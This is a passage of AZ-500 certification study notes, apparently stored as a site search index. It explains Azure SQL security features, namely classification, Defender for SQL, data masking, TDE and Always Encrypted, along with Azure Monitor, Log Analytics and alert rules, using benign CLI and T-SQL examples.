        • Discovery and recommendations\u00a0- The classification engine scans your database and identifies columns containing potentially sensitive data. It then provides you with an easier way to review and apply the appropriate classification recommendations via the Azure portal.
        • Labeling\u00a0- Sensitivity classification labels can be persistently tagged on columns using new classification metadata attributes introduced into the SQL Server Engine. This metadata can then be utilized for advanced sensitivity-based auditing and protection scenarios.
        • Information Types\u00a0- These provide additional granularity into the type of data stored in the column.
        • Query result set sensitivity\u00a0- The sensitivity of the query result set is calculated in real time for auditing purposes.
        • Visibility\u00a0- You can view the database classification state in a detailed dashboard in the Azure portal. Additionally, you can download a report (in Microsoft Excel format) that you can use for compliance and auditing purposes, in addition to other needs.

        SQL data discovery and classification comes with a built-in set of sensitivity labels and information types, and discovery logic. You can now customize this taxonomy and define a set and ranking of classification constructs specifically for your environment. Definition and customization of your classification taxonomy takes place in one central location for your entire Azure Tenant. That location is in Microsoft Defender for Cloud, as part of your Security Policy. Only a user with administrative rights on the Tenant root management group can perform this task.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#45-microsoft-defender-for-sql","title":"4.5. Microsoft Defender for SQL","text":"

        Applies to:\u00a0Azure SQL Database\u00a0|\u00a0Azure SQL Managed Instance\u00a0|\u00a0Azure Synapse Analytics

        Microsoft Defender for SQL includes functionality for surfacing and mitigating potential database vulnerabilities and detecting anomalous activities that could indicate a threat to your database. It provides a single go-to location for enabling and managing these capabilities.

        Microsoft Defender for SQL provides:

        • Vulnerability Assessment is an easy-to-configure service that can discover, track, and help you remediate potential database vulnerabilities. It provides visibility into your security state, and it includes actionable steps to resolve security issues and enhance your database fortifications.
        • Advanced Threat Protection detects anomalous activities indicating unusual and potentially harmful attempts to access or exploit your database. It continuously monitors your database for suspicious activities, and it provides immediate security alerts on potential vulnerabilities, Azure SQL injection attacks, and anomalous database access patterns. Advanced Threat Protection alerts provide details of suspicious activity and recommend action on how to investigate and mitigate the threat.

        Enabling or managing Microsoft Defender for SQL settings requires belonging to the SQL security manager role or one of the database or server admin roles.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#vulnerability-assessment-for-sql-server","title":"Vulnerability assessment for SQL Server","text":"

        Applies to: Azure SQL Database\u00a0|\u00a0Azure SQL Managed Instance\u00a0|\u00a0Azure Synapse Analytics

        • Vulnerability assessment is a scanning service built into Azure SQL Database.
        • The service employs a knowledge base of rules that flag security vulnerabilities.
        • These rules cover database-level and server-level security issues (like server firewall settings and server-level permissions), including permission configurations, feature configurations, and database settings.
        • The results of the scan include actionable steps to resolve each issue and provide customized remediation scripts where applicable.
        • Vulnerability assessment is part of Microsoft Defender for Azure SQL, which is a unified package for advanced SQL security capabilities. Vulnerability assessment can be accessed and managed from each SQL database resource in the Azure portal.

        SQL vulnerability assessment express and classic configurations. - You can configure vulnerability assessment for your SQL databases with either:

        • Express configuration (preview) \u2013 The default procedure that lets you configure vulnerability assessment without dependency on external storage to store baseline and scan result data.
        • Classic configuration \u2013 The legacy procedure that requires you to manage an Azure storage account to store baseline and scan result data.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#46-sql-advanced-threat-protection","title":"4.6. SQL Advanced Threat Protection","text":"

        Applies to: Azure SQL Database | Azure SQL Managed Instance | Azure Synapse Analytics | SQL Server on Azure Virtual Machines | Azure Arc-enabled SQL Server

        • SQL Advanced Threat Protection detects anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases.
        • Users receive an alert upon suspicious database activities, potential vulnerabilities, and SQL injection attacks, as well as anomalous database access and query patterns.
        • Advanced Threat Protection integrates alerts with Microsoft Defender for Cloud.
        • For a full investigation experience, it is recommended to enable auditing, which writes database events to an audit log in your Azure storage account.
        • Click\u00a0the\u00a0Advanced Threat Protection alert\u00a0to launch the Microsoft Defender for Cloud alerts page and get an overview of active SQL threats detected on the database.
        • Advanced Threat Protection is part of the Microsoft Defender for SQL offering, which is a unified package for advanced SQL security capabilities. Advanced Threat Protection can be accessed and managed via the central Microsoft Defender for SQL portal.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#47-sql-database-dynamic-data-masking-ddm","title":"4.7. SQL Database Dynamic Data Masking (DDM)","text":"

        Dynamic data masking helps prevent unauthorized access to sensitive data by enabling customers to designate how much of the sensitive data to reveal, with minimal impact on the application layer. You set up a dynamic data masking policy in the Azure portal by selecting the dynamic data masking operation in your SQL Database configuration blade or settings blade. For Azure Synapse, this feature cannot be set by using the portal.

        Configuring DDM policy. -

        • SQL users excluded from masking\u00a0- A set of SQL users or Microsoft Entra identities that get unmasked data in the SQL query results. Users with administrator privileges are always excluded from masking, and view the original data without any mask.
        • Masking rules\u00a0- A set of rules that define the designated fields to be masked and the masking function that is used. The designated fields can be defined using a database schema name, table name, and column name.
        • Masking functions\u00a0- A set of methods that control the exposure of data for different scenarios.

        The DDM recommendations engine flags certain fields from your database as potentially sensitive fields, which may be good candidates for masking. In the Dynamic Data Masking blade in the portal, you can review the recommended columns for your database. All you need to do is click Add Mask for one or more columns and then Save to apply a mask for these fields.
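        As a T-SQL sketch run via sqlcmd (hypothetical table, column, and user names; email() is one of the built-in masking functions):

        ```
        sqlcmd -S myserver.database.windows.net -d mydb -G -Q "
        -- Mask the designated field with the email masking function
        ALTER TABLE dbo.Members ALTER COLUMN Email ADD MASKED WITH (FUNCTION = 'email()');

        -- Exclude a specific user from masking
        GRANT UNMASK TO [auditor_user];
        "
        ```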

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#48-implement-transparent-data-encryption-tde","title":"4.8. Implement Transparent Data Encryption (TDE)","text":"
        • Applies to Azure SQL Database | Azure SQL Managed Instance | Synapse SQL in Azure Synapse Analytics.
        • To configure TDE through the Azure portal, you must be connected as the Azure Owner, Contributor, or SQL Security Manager.
        • Encrypts data at rest.
        • It performs real-time encryption and decryption of the database, associated backups, and transaction log files at rest without requiring changes to the application.
        • By default, TDE is enabled for all newly deployed Azure SQL databases\u00a0and needs to be manually enabled for older databases of Azure SQL Database, Azure SQL Managed Instance, or Azure Synapse.
        • It cannot be used to encrypt the logical master database, because this database contains objects that TDE needs to perform the encrypt/decrypt operations.
        • TDE encrypts the storage of an entire database by using a symmetric key called the Database Encryption Key (DEK).
        • DEK is protected by the TDE protector. Where is this TDE protector set?:
          • At the logical SQL server level: For Azure SQL Database and Azure Synapse, the TDE protector is set at the logical SQL server level and is inherited by all databases associated with that server.
          • At the instance level: For Azure SQL Managed Instance (BYOK feature in preview), the TDE protector is set at the instance level and it is inherited by all encrypted databases on that instance.

        The TDE protector is either a service-managed certificate (service-managed transparent data encryption) or an asymmetric key stored in Azure Key Vault (customer-managed transparent data encryption).

        • The default setting for TDE is that the DEK is protected by a built-in server certificate.
          • If two databases are connected to the same server, they also share the same built-in certificate.
          • The built-in server certificate is unique for each server and the encryption algorithm used is AES 256.
          • Microsoft automatically rotates these certificates. Additionally, Microsoft seamlessly moves and manages the keys as needed for geo-replication and restores.
          • The root key is protected by a Microsoft internal secret store.
        • With customer-managed TDE, or Bring Your Own Key (BYOK), the TDE protector that encrypts the DEK is a customer-managed asymmetric key, which is stored in a customer-owned and managed Azure Key Vault (Azure's cloud-based external key management system) and never leaves the key vault.
          • The TDE Protector can be generated by the key vault or transferred to the key vault from an on premises hardware security module (HSM) device.
          • SQL Database needs to be granted permissions to the customer-owned key vault to decrypt and encrypt the DEK.
          • With TDE with Azure Key Vault integration, users can control key management tasks including key rotations, key vault permissions, key backups, and enable auditing/reporting on all TDE protectors using Azure Key Vault functionality.

        You can turn TDE on and off from the Azure portal, except for Azure SQL Managed Instance, where you need to use T-SQL to turn TDE on and off on a database (see the sketch below).

        Transact-SQL (T-SQL) is an extension of the standard SQL (Structured Query Language) used for querying and managing relational databases, particularly in the context of Microsoft SQL Server and Azure SQL Database. It is needed and used for the following reasons:

        1. Procedural capabilities: T-SQL includes procedural programming constructs such as variables, loops, and conditional statements, which are not part of standard SQL.
        2. SQL Server-specific functions: T-SQL includes functions and features that are specific to SQL Server and may not be supported by other database management systems.
        3. System management: T-SQL provides commands and procedures for managing SQL Server instances, databases, and security, which are not part of the standard SQL language.
        4. Error handling: T-SQL has error handling mechanisms like TRY...CATCH blocks, which are not part of the standard SQL syntax.
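        A sketch of both paths (hypothetical names; the CLI commands are from the az sql db tde group):

        ```
        # Azure SQL Database: check and enable TDE with the CLI
        az sql db tde show --resource-group rg1 --server myserver --database mydb
        az sql db tde set --resource-group rg1 --server myserver --database mydb --status Enabled

        # Azure SQL Managed Instance: T-SQL only
        sqlcmd -S <managed-instance-fqdn> -d master -G -Q "ALTER DATABASE mydb SET ENCRYPTION ON;"
        ```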

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#49-azure-sql-always-encrypted","title":"4.9. Azure SQL Always Encrypted","text":"

        Always Encrypted helps protect sensitive data at rest on the server, during movement between client and server, and while the data is in use. Always Encrypted ensures that sensitive data never appears as plaintext inside the database system. After you configure data encryption, only client applications or app servers that have access to the keys can access plaintext data. Always Encrypted uses the AEAD_AES_256_CBC_HMAC_SHA_256 algorithm to encrypt data in the database.

        Always Encrypted allows clients to encrypt sensitive data inside client applications and never reveal the encryption keys to the Database Engine (SQL Database or SQL Server).

        Two examples:

        • Client on-premises with data in Azure: A customer has an on-premises client application at their business location. The application operates on sensitive data stored in a database hosted in Azure (SQL Database or SQL Server running in a virtual machine on Microsoft Azure). The customer uses Always Encrypted and stores the Always Encrypted keys in a trusted key store hosted on-premises, to ensure Microsoft cloud administrators have no access to sensitive data.
        • Client and data in Azure: A customer has a client application, hosted in Microsoft Azure (for example, in a worker role or a web role), which operates on sensitive data stored in a database hosted in Azure (SQL Database or SQL Server running in a virtual machine on Microsoft Azure). Although Always Encrypted does not provide complete isolation of data from cloud administrators, as both the data and keys are exposed to cloud administrators of the platform hosting the client tier, the customer still benefits from reducing the security attack surface area (the data is always encrypted in the database).

        The Always Encrypted-enabled driver automatically encrypts and decrypts sensitive data in the client application before sending the data off to the SQL server. Always Encrypted supports two types of encryption: randomized encryption and deterministic encryption.

        • Deterministic encryption\u00a0always generates the same encrypted value for any given plain text value. Using deterministic encryption allows point lookups, equality joins, grouping and indexing on encrypted columns. However, it may also allow unauthorized users to guess information about encrypted values by examining patterns in the encrypted column, especially if there is a small set of possible encrypted values, such as True/False, or North/South/East/West region. Deterministic encryption must use a column collation with a binary2 sort order for character columns.
        • Randomized encryption\u00a0uses a method that encrypts data in a less predictable manner. Randomized encryption is more secure, but prevents searching, grouping, indexing, and joining on encrypted columns.
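        A T-SQL sketch of a column configured for deterministic Always Encrypted (hypothetical table; CEK1 is an assumed, pre-provisioned column encryption key; note the binary2 collation required for deterministic character columns):

        ```
        sqlcmd -S myserver.database.windows.net -d mydb -G -Q "
        CREATE TABLE dbo.Patients (
            PatientId INT IDENTITY(1,1) PRIMARY KEY,
            SSN CHAR(11) COLLATE Latin1_General_BIN2
                ENCRYPTED WITH (
                    COLUMN_ENCRYPTION_KEY = CEK1,
                    ENCRYPTION_TYPE = DETERMINISTIC,
                    ALGORITHM = 'AEAD_AES_256_CBC_HMAC_SHA_256'
                ) NOT NULL
        );
        "
        ```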

        Always Encrypted is available in all editions of Azure SQL Database, and in SQL Server starting with SQL Server 2016.

        Deploy an Always Encrypted implementation. -

        The initial setup of Always Encrypted in a database involves generating Always Encrypted keys, creating key metadata, configuring encryption properties of selected database columns, and/or encrypting data that may already exist in columns that need to be encrypted.

        Some of these tasks aren't supported in Transact-SQL. You can use SQL Server Management Studio (SSMS) or PowerShell to accomplish such tasks.

        | Task | SSMS | PowerShell | SQL |
        |---|---|---|---|
        | Provisioning column master keys, column encryption keys and encrypted column encryption keys with their corresponding column master keys | Yes | Yes | No |
        | Creating key metadata in the database | Yes | Yes | Yes |
        | Creating new tables with encrypted columns | Yes | Yes | Yes |
        | Encrypting existing data in selected database columns | Yes | Yes | No |

        When setting up encryption for a column, you specify the information about the encryption algorithm and cryptographic keys used to protect the data in the column. Always Encrypted uses two types of keys: column encryption keys and column master keys. A column encryption key is used to encrypt data in an encrypted column. A column master key is a key-protecting key that encrypts one or more column encryption keys.

        The Database Engine stores encryption configuration for each column in database metadata. Note, however, the Database Engine never stores or uses the keys of either type in plaintext. It only stores encrypted values of column encryption keys and the information about the location of column master keys, which are stored in external trusted key stores, such as Azure Key Vault, Windows Certificate Store on a client machine, or a hardware security module.

        To access data stored in an encrypted column in plaintext, an application must use an Always Encrypted-enabled client driver. When an application issues a parameterized query, the driver transparently collaborates with the Database Engine to determine which parameters target encrypted columns and, thus, should be encrypted. For each parameter that needs to be encrypted, the driver obtains the information about the encryption algorithm and the encrypted value of the column encryption key for the column the parameter targets, as well as the location of its corresponding column master key.

        Next, the driver contacts the key store, containing the column master key, in order to decrypt the encrypted column encryption key value and then, it uses the plaintext column encryption key to encrypt the parameter. The resultant plaintext column encryption key is cached to reduce the number of round trips to the key store on subsequent uses of the same column encryption key. The driver substitutes the plaintext values of the parameters targeting encrypted columns with their encrypted values, and it sends the query to the server for processing.

        The server computes the result set, and for any encrypted columns included in the result set, it attaches the encryption metadata for the column, including the information about the encryption algorithm and the corresponding keys. The driver first tries to find the plaintext column encryption key in the local cache, and only makes a round trip to the key store holding the column master key if it can't find the key in the cache. Next, the driver decrypts the results and returns plaintext values to the application.

        A client driver interacts with a key store, containing a column master key, using a column master key store provider, which is a client-side software component that encapsulates a key store containing the column master key. Providers for common types of key stores are available in client-side driver libraries from Microsoft or as standalone downloads. You can also implement your own provider. Always Encrypted capabilities, including built-in column master key store providers vary by a driver library and its version.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/","title":"IV. Security operation","text":"Sources of this notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023)
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        100 questions you should pass for the AZ-500 certificate

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#1-configure-and-manage-azure-monitor","title":"1. Configure and manage Azure Monitor","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#11-exploring-azure-monitor","title":"1.1. Exploring Azure Monitor","text":"

        Exporting data to a SIEM

        Azure Monitor offers a consolidated pipeline for routing any of your monitoring data into a SIEM tool. This is done by streaming that data to an event hub, where it can then be pulled into a partner tool. This pipe uses the Azure Monitor single pipeline for getting access to the monitoring data from your Azure environment. Currently, the exposed security data from Microsoft Defender for Cloud to a SIEM consists of security alerts.

        Microsoft Defender for Cloud security alerts. - Microsoft Defender for Cloud automatically collects, analyzes, and integrates log data from your Azure resources, the network, and connected partner solutions.

        Azure Event Hubs. - Azure Event Hubs is a streaming platform and event ingestion service that can transform and store data by using any real-time analytics provider or batching/storage adapters. Use Event Hubs to stream log data from Azure Monitor to Microsoft Sentinel or to partner SIEM and monitoring tools.

        What data can be sent into an event hub? Within your Azure environment, there are several 'tiers' of monitoring data, and the method of accessing data from each tier varies slightly.

        • Application monitoring data\u00a0- Data about the performance and functionality of the code you have written and are running on Azure. Examples of application monitoring data include performance traces, application logs, and user telemetry. Application monitoring data is usually collected in one of the following ways:
          • By instrumenting your code with an SDK such as the\u00a0Application Insights SDK.
          • By running a monitoring agent that listens for new application logs on the machine running your application, such as the\u00a0Windows Azure Diagnostic Agent\u00a0or\u00a0Linux Azure Diagnostic Agent.
        • Guest OS monitoring data\u00a0- Data about the operating system on which your application is running. Examples of guest OS monitoring data would be Linux syslog or Windows system events. To collect this type of data, you need to install an agent such as the\u00a0Windows Azure Diagnostic Agent\u00a0or\u00a0Linux Azure Diagnostic Agent.
        • Azure resource monitoring data\u00a0- Data about the operation of an Azure resource. For some Azure resource types, such as virtual machines, there is a guest OS and application(s) to monitor inside of that Azure service. For other Azure resources, such as Network Security Groups, the resource monitoring data is the highest tier of data available (since there is no guest OS or application running in those resources). This data can be collected using resource diagnostic settings.
        • Azure subscription monitoring data\u00a0- Data about the operation and management of an Azure subscription, as well as data about the health and operation of Azure itself. The activity log contains most subscription monitoring data, such as service health incidents and Azure Resource Manager audits. You can collect this data using a Log Profile.
        • Azure tenant monitoring data\u00a0- Data about the operation of tenant-level Azure services, such as Microsoft Entra ID. The Microsoft Entra audits and sign-ins are examples of tenant monitoring data. This data can be collected using a tenant diagnostic setting.
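        Whatever the tier, the routing step itself is a diagnostic setting that targets an event hub. A hedged CLI sketch (hypothetical names; the log category depends on the resource type, and the authorization-rule ID points at the Event Hubs namespace):

        ```
        az monitor diagnostic-settings create \
            --name export-to-siem \
            --resource "<resource-id>" \
            --event-hub myhub \
            --event-hub-rule "<event-hubs-namespace-authorization-rule-id>" \
            --logs '[{"category": "AuditEvent", "enabled": true}]'
        ```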

        Some of the features of Microsoft Sentinel are:

        • More than 100 built-in alert rules
          • Sentinel's alert rule wizard to create your own.
          • Alerts can be triggered by a single event or based on a threshold, or by correlating different datasets or by using built-in machine learning algorithms.
        • Jupyter Notebooks\u00a0that use a growing collection of hunting queries, exploratory queries, and python libraries.
        • Investigation graph\u00a0for visualizing and traversing the connections between entities like users, assets, applications, or URLs and related activities like logins, data transfers, or application usage to rapidly understand the scope and impact of an incident.

        To onboard Microsoft Sentinel:

        • Enable it.
        • Connect your data sources with connectors that include Microsoft Threat Protection solutions, Microsoft 365 sources, Microsoft Entra ID, Azure ATP, and Microsoft Cloud App Security. In addition, there are built-in connectors to the broader security ecosystem for non-Microsoft solutions. You can also use Common Event Format, Syslog, or the REST API to connect your data sources with Microsoft Sentinel.
        • After you connect your data sources, choose from a gallery of expertly created dashboards that surface insights based on your data.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#12-configure-and-monitor-metrics-and-logs","title":"1.2. Configure and monitor metrics and logs","text":"

        All data that Azure Monitor collects fits into one of two fundamental types:\u00a0metrics or logs.

        Azure Monitor Metrics. - Metrics are numerical values that are collected at regular intervals and describe some aspect of a system at a particular time. There are multiple types of metrics supported by Azure Monitor Metrics:

        • Native metrics\u00a0use tools in Azure Monitor for analysis and alerting.
          • Platform metrics are collected from Azure resources. They require no configuration and have no cost.
          • Custom metrics are collected from different sources that you configure, including applications and agents running on virtual machines.
        • Prometheus metrics\u00a0(preview) are collected from Kubernetes clusters, including Azure Kubernetes Service (AKS), and use industry-standard tools for analyzing and alerting, such as PromQL and Grafana.
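        As a quick illustration of native platform metrics (collected with no prior configuration), they can be queried with the CLI against a hypothetical resource ID:

        ```
        az monitor metrics list \
            --resource "<vm-resource-id>" \
            --metric "Percentage CPU" \
            --interval PT5M
        ```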

        What is Prometheus? Prometheus is an open-source toolkit that collects data for monitoring and alerting.

        Prometheus Features:

        • A multi-dimensional data model with time series data identified by metric name and key/value pairs
        • PromQL (the Prometheus query language) provides a flexible query language to leverage this dimensionality.
        • Time series collection happens via a pull model over Hypertext Transfer Protocol (HTTP)
        • Pushing time series is supported via an intermediary gateway
        • Targets are discovered via service discovery or static configuration

        What is Azure Managed Grafana?

        Azure Managed Grafana is a data visualization platform built on top of the Grafana software by Grafana Labs. It's built as a fully managed Azure service operated and supported by Microsoft. Grafana helps you combine metrics, logs, and traces into a single user interface. With its extensive support for data sources and graphing capabilities, you can view and analyze your application and infrastructure telemetry data in real-time.

        Azure Managed Grafana is optimized for the Azure environment. It works seamlessly with many Azure services. Specifically, for the current preview, it provides the following integration features:

        • Built-in support for Azure Monitor and Azure Data Explorer
        • User authentication and access control using Microsoft Entra identities
        • Direct import of existing charts from the Azure portal

        Why use Azure Managed Grafana?

        Managed Grafana\u00a0lets you bring together all your telemetry data into one place. It can access various data sources supported, including your data stores in Azure and elsewhere.

        As a fully managed service, Azure Managed Grafana lets you deploy Grafana without having to deal with setup. The service provides high availability, service level agreement (SLA) guarantees, and automatic software updates.

        You can share Grafana dashboards with people inside and outside your organization and allow others to join in for monitoring or troubleshooting. Managed Grafana uses\u00a0Microsoft Entra ID\u2019s centralized identity management, which allows you to control which users can use a Grafana instance, and you can use managed identities to access Azure data stores, such as Azure Monitor.

        You can create dashboards instantaneously by importing existing charts directly from the Azure portal or by using prebuilt dashboards.

        Summarizing:

        | Category | Native platform metrics | Native custom metrics | Prometheus metrics (preview) |
        |---|---|---|---|
        | Sources | Azure resources | Azure Monitor agent, Application Insights, REST API | Azure Kubernetes Service (AKS) cluster, any Kubernetes cluster through remote-write |
        | Configuration | None | Varies by source | Enable Azure Monitor managed service for Prometheus |
        | Stored | Subscription | Subscription | Azure Monitor workspace |
        | Cost | No | Yes | Yes (free during preview) |
        | Aggregation | pre-aggregated | pre-aggregated | raw data |
        | Analyze | Metrics Explorer | Metrics Explorer | Prometheus query language (PromQL), Grafana dashboards |
        | Alert | metrics alert rule | metrics alert rule | Prometheus alert rule |
        | Visualize | Workbooks, Azure dashboards, Grafana | Workbooks, Azure dashboards, Grafana | Grafana |
        | Retrieve | Azure CLI, Azure PowerShell cmdlets, REST API or client library (.NET, Go, Java, JavaScript, Python) | Azure CLI, Azure PowerShell cmdlets, REST API or client library (.NET, Go, Java, JavaScript, Python) | Grafana |

        Azure Monitor collects metrics from the following sources. After these metrics are collected in the Azure Monitor metric database, they can be evaluated together regardless of their source:

        • Azure resources:\u00a0Platform metrics are created by Azure resources and give you visibility into their health and performance. Each type of resource creates a distinct set of metrics without any configuration required. Platform metrics are collected from Azure resources at a one-minute frequency unless specified otherwise in the metric's definition.
        • Applications:\u00a0Application Insights creates metrics for your monitored applications to help you detect performance issues and track trends in how your application is used. Values include Server response time and Browser exceptions.
        • Virtual machine agents:\u00a0Metrics are collected from the guest operating system of a virtual machine. You can enable guest operating system (OS) metrics for Windows virtual machines using the Windows diagnostic extension and Linux virtual machines by using the InfluxData Telegraf agent.
        • Custom metrics:\u00a0You can define metrics in addition to the standard metrics that are automatically available. You can define custom metrics in your application that are monitored by Application Insights. You can also create custom metrics for an Azure service by using the custom metrics Application Programming Interface (API).
        • Kubernetes clusters:\u00a0Kubernetes clusters typically send metric data to a local Prometheus server that you must maintain. Azure Monitor managed service for Prometheus provides a managed service that collects metrics from Kubernetes clusters and stores them in Azure Monitor Metrics.

        A common type of log entry is an event, which is collected sporadically.

        Applications can create custom logs by using the structure that they need.

        Metric data can even be stored in Logs to combine them with other monitoring data for trending and other data analysis.

        KQL (Kusto query language). - Data in Azure Monitor Logs is retrieved using a log query written with the Kusto query language, which allows you to quickly retrieve, consolidate, and analyze collected data. Use Log Analytics to write and test log queries in the Azure portal. It allows you to work with results interactively or pin them to a dashboard to view them with other visualizations.
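        A sketch of running a KQL query from bash (requires the log-analytics CLI extension; the workspace GUID is hypothetical, and the SigninLogs table assumes Entra sign-in logs are routed to the workspace):

        ```
        az monitor log-analytics query \
            --workspace "<workspace-guid>" \
            --analytics-query "SigninLogs | where TimeGenerated > ago(1h) | summarize count() by ResultType"
        ```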

        How security tools use Azure Monitor Logs:

        • Microsoft Defender for Cloud\u00a0stores data that it collects in a Log Analytics workspace where it can be analyzed with other log data.
        • Azure Sentinel\u00a0stores data from data sources into a Log Analytics workspace.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#13-enable-log-analytics","title":"1.3. Enable Log Analytics","text":"

        Log Analytics is the primary tool in the Azure portal for writing log queries and interactively analyzing their results. Even if a log query is used elsewhere in Azure Monitor, you'll typically write and test the query first using Log Analytics.

        You can start Log Analytics from several places in the Azure portal. The scope of the data available to Log Analytics is determined by how you start it.

        • Select Logs from the Azure Monitor menu or Log Analytics workspaces menu.
        • Select Analytics from the Overview page of an Application Insights application.
        • Select Logs from the menu of an Azure resource.

        In addition to interactively working with log queries and their results in Log Analytics, areas in Azure Monitor where you will use queries include the following:

        • Alert rules. Alert rules proactively identify issues from data in your workspace. Each alert rule is based on a log search that is automatically run at regular intervals. The results are inspected to determine if an alert should be created.
        • Dashboards. You can pin the results of any query into an Azure dashboard which allow you to visualize log and metric data together and optionally share with other Azure users.
        • Views. You can create visualizations of data to be included in user dashboards with View Designer. Log queries provide the data used by tiles and visualization parts in each view.
        • Export. When you import log data from Azure Monitor into Excel or Power BI, you create a log query to define the data to export.
        • PowerShell. Use the results of a log query in a PowerShell script from a command line or an Azure Automation runbook that uses\u00a0Invoke-AzOperationalInsightsQuery.
        • Azure Monitor Logs API. The Azure Monitor Logs API allows any REST API client to retrieve log data from the workspace. The API request includes a query that is run against Azure Monitor to determine the data to retrieve.
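        To illustrate the last item, a hedged sketch of calling the Azure Monitor Logs API through az rest; the workspace GUID is a placeholder, and az rest acquires a token for the resource you pass:

        ```bash
        # Query the Azure Monitor Logs REST API directly. The body carries
        # the KQL query to run against the workspace.
        az rest --method post \
          --url "https://api.loganalytics.io/v1/workspaces/$WORKSPACE_ID/query" \
          --resource "https://api.loganalytics.io" \
          --body '{"query": "Heartbeat | summarize count() by Computer"}'
        ```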

        At the center of Log Analytics is the Log Analytics workspace, which is hosted in Azure.

        • Log Analytics collects data in the workspace from connected sources by configuring data sources and adding solutions to your subscription.
        • Data sources and solutions each create different record types, each with its own set of properties, but you can still analyze sources and solutions together in queries to the workspace.
        • A Log Analytics workspace is a unique environment for Azure Monitor log data: each workspace has its own data repository and configuration, and data sources and solutions are configured to store their data in a particular workspace.
        • You require a Log Analytics workspace if you intend to collect data from the following sources:
          • Azure resources in your subscription
          • On-premises computers monitored by System Center Operations Manager
          • Device collections from Configuration Manager
          • Diagnostics or log data from Azure storage
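        A workspace can also be created from the CLI; a minimal sketch with assumed resource names and region:

        ```bash
        # Create a resource group and a Log Analytics workspace in it.
        # "rg-demo", "law-demo", and "westeurope" are placeholder values.
        az group create --name rg-demo --location westeurope
        az monitor log-analytics workspace create \
          --resource-group rg-demo \
          --workspace-name law-demo \
          --location westeurope
        ```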

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#14-manage-connected-sources-for-log-analytics","title":"1.4. Manage connected sources for log analytics","text":"
        • The Azure Log Analytics agent was developed for comprehensive management across virtual machines in any cloud, on-premises machines, and those monitored by System Center Operations Manager.
        • The Windows and Linux agents send collected data from different sources to your Log Analytics workspace in Azure Monitor, as well as any unique logs or metrics as defined in a monitoring solution.
        • The Log Analytics agent also supports insights and other services in Azure Monitor such as Azure Monitor for VMs, Microsoft Defender for Cloud, and Azure Automation.

        There is also the Azure diagnostics extension, which collects monitoring data from the guest operating system of Azure virtual machines. Differences:

        | Azure Diagnostics Extension | Log Analytics agent |
        | --- | --- |
        | Used only with Azure virtual machines. | Used with virtual machines in Azure, other clouds, and on-premises. |
        | Sends data to Azure Storage, Azure Monitor Metrics (Windows only), and Event Hubs. | Sends data to Azure Monitor Logs (to a Log Analytics workspace). |
        | Not specifically required. | Required for Azure Monitor for VMs and other services such as Microsoft Defender for Cloud. |

        The Windows agent can be multihomed to send data to multiple workspaces and System Center Operations Manager management groups. The Linux agent can send to only a single destination. The agent for Linux and Windows isn't only for connecting to Azure Monitor, it also supports Azure Automation to host the Hybrid Runbook worker role and other services such as Change Tracking, Update Management, and Microsoft Defender for Cloud.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#15-enable-azure-monitor-alerts","title":"1.5. Enable Azure monitor Alerts","text":"

        Azure monitor has metrics, logging, and analytics features. Another feature is Monitor Alerts.

        Alerts in Azure Monitor proactively notify you of critical conditions and potentially attempt to take corrective action. Alert rules based on metrics provide near real time alerting based on numeric values, while rules based on logs allow for complex logic across data from multiple sources.

        The unified alert experience in Azure Monitor includes alerts that were previously managed by Log Analytics and Application Insights. In the past, Azure Monitor, Application Insights, Log Analytics, and Service Health had separate alerting capabilities. Over time, Azure improved and combined both the user interface and different methods of alerting. The consolidation is still in process.

        • The alert rule captures the target and criteria for alerting. \u00a0The alert rule can be in an enabled or a disabled state. Alerts only fire when enabled.
        • Target Resource: Defines the scope and signals available for alerting. A target can be any Azure resource. Example targets: a virtual machine, a storage account, a virtual machine scale set, a Log Analytics workspace, or an Application Insights resource. For certain resources (like virtual machines), you can specify multiple resources as the target of the alert rule.
        • Signal: Emitted by the target resource. Signals can be of the following types: metric, activity log, Application Insights, and log.
        • Criteria: A combination of signal and logic applied on a target resource. Examples:
          • Percentage CPU > 70%
          • Server Response Time > 4 ms
          • Result count of a log query > 100
        • Alert Name: A specific name for the alert rule configured by the user.
        • Alert Description: A description for the alert rule configured by the user.
        • Severity: The severity of the alert after the criteria specified in the alert rule are met. Severity can range from 0 to 4.
          • Sev 0 = Critical
          • Sev 1 = Error
          • Sev 2 = Warning
          • Sev 3 = Informational
          • Sev 4 = Verbose
        • Action: A specific action taken when the alert is fired.
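        Tying these components together, a minimal CLI sketch of a metric alert rule; all names and the scope are assumptions:

        ```bash
        # Metric alert that fires when average CPU on a VM exceeds 70% over
        # a 5-minute window, evaluated every minute, at severity 2 (Warning).
        az monitor metrics alert create \
          --name HighCpuAlert \
          --resource-group rg-demo \
          --scopes "/subscriptions/<sub-id>/resourceGroups/rg-demo/providers/Microsoft.Compute/virtualMachines/vm-demo" \
          --condition "avg Percentage CPU > 70" \
          --window-size 5m \
          --evaluation-frequency 1m \
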